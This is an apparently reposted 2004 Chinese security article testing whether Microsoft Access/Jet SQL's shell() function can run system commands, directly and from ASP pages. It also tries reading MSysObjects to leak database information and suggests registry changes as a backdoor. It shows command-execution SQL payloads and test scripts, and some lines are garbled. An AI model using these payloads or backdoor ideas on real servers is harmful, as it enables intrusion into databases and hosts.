Access的一些测试

【作者：SuperHei 来源：网络更新时间：2006-9-4 | 字体：大中小】

本文作者：SuperHei
文章性质：原创
发布日期：2004-09-16

我们先在accessl里直接sql查询:

SELECT shell('c:\winnt\system32\cmd.exe /c dir c:\ >c:\123456.txt');

“运行”得到结果:

C:\>dir 123456.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CEE-A8A9

C:\ 的目录

2004-01-09 22:29 1,718 123456.txt
1 个文件 1,718 字节
0 个目录 1,224,527,872 可用字节
C:\>type 123456.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CEE-A8A9

c:\ 的目录

2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt

成功执行,我们看看权限，语句改为:

SELECT shell('c:\winnt\system32\cmd.exe /c dir c:\ >c:3456.txt');

运行后:

C:\>net user

\KAK-E8UHOQQ9M6S 的用户帐户

----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
命令成功完成。

看来权限比较大(不过可能是继承了运行access的用户的权限,我用的是管理员权限运行的,对guest的没有测试)

下面我们测试sp里执行,首先自己写个asp,代码如下:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:\winnt\system32\cmd.exe /c dir c:\ > d:\sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
response.write "sql为：" &sql

运行这个asp,返回结果如下:

Microsoft VBScript 编译器错误错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

Microsoft JET Database Engine 错误 '80040e14'

表达式中 'shell' 函数未定义。

/test/lse/Connections/kaoo6.asp，行7

提示” 'shell' 函数未定义”,测试失败,我把asp代码里的
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
改为 dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")

运行ie返回:

Microsoft VBScript 编译器错误错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

ADODB.Connection 错误 '800a0e7a'

Provider cannot be found. It may not be properly installed.

/test/lse/Connections/kaoo8.asp，行5

Provider没有安装没有继续测试.

2.关于暴库的测试

这里使用MsysObjecs : 我们新建立个查询,语句如下:

SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate 得到建立时间
MSysObjects.DateUpdate 更新时间
MSysObjects.Name 数据库名称
MSysObjects.Type 数据库类型

我们执行上面的语句,直接得到结果:

我们放到asp里:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
response.write "sql为：" &sql

ie返回:

Microsoft VBScript 编译器错误错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

Microsoft JET Database Engine 错误 '80040e09'

不能读取记录；在 'MSysObjects' 上没有读取数据权限。

/test/lse/Connections/kaoo7.asp，行7

提示不能读取记录；在 'MSysObjects' 上没有读取数据权限。没办法了,这个办法又夭折拉.

3.补充:

在iis5(Microsoft.Jet.OLEDB.4.0)我们不可以直接执行shell(据说在Jet 3.5 也就是在iis4的时代可以),在Jet.OLEDB.4.0默认的情况下不可以,但是可以设置,我们可以通过改注册表等来实现,具体的不知道.

后门思路:

1,就是上面的改注册表,让Jet.OLEDB.4.0支持shell 这样我们可以在asp里直接利用.
2.我们通过其他程序,直接对mdb文件操作,利用select shell()执行系统命令.

收藏此页到 IE收藏夹 POCO网摘 [365Key] [ViVi] 百度藏搜和讯网摘天极网摘狐摘向您的朋友推荐此文章
转载请注明来源：文章大全网址：http://www.itlearner.com/article/
文章关键词：access
如意搜索搜索更多内容：Access的一些测试
特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系我们，我们会尽快予以更正。